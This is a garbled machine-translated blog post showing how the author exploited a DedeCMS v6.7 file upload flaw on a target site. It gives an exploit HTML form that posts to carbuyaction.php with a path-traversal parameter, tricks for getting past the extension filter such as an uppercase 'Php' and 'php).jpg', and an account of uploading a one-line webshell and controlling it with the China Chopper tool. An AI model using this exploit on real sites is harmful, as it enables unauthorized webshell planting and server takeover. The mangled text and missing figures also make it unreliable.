Zhimeng cms v6.7 latest Upload Vulnerability

The following figure shows the dedecms 6.7 Upload Vulnerability.
The target site is crawled in html format.
 






 
Scan Yu Jian
 

 
 
 
It can be registered.
I saw a dream Upload Vulnerability published by Daniel a few days ago.
<Form action = "http: // www.2cto.com/plus/carbuyaction. php? Dopost = memclickout & oid = S-P0RN8888 & rs [code] = ../dialog/select_soft_post "method =" post "enctype =" multipart/form-data "name =" form1 ">
File: <input name = "uploadfile" type = "file"/> <br>
Newname: <input name = "newname" type = "text" value = "myfile. Php"/>
<Button class = "button2" type = "submit"> submit </button> <br>
1. You must log on to the user. <Br>
2. Change the extension of the PHP file to "zip | gz | rar | iso | doc | xsl | ppt | wps. <Br>
3. newname is the new file name after upload, And the extension is bypassed in uppercase, such as "Php ". <Br>
</Form>
 
So register the user, construct an html file, change the file format to rar, and upload a sentence
 
 
 
 
The results are not that simple,
 
What's going on? I tried to change the file name in other formats and cannot upload the file.
Because the uploaded files are directly on-site directories, I figured out the loopholes in php).jpg.
 
 
 
 
 
Page blank
 
Connect it with a kitchen knife,


Successfully entered. Thank you for watching
Original article: Love blog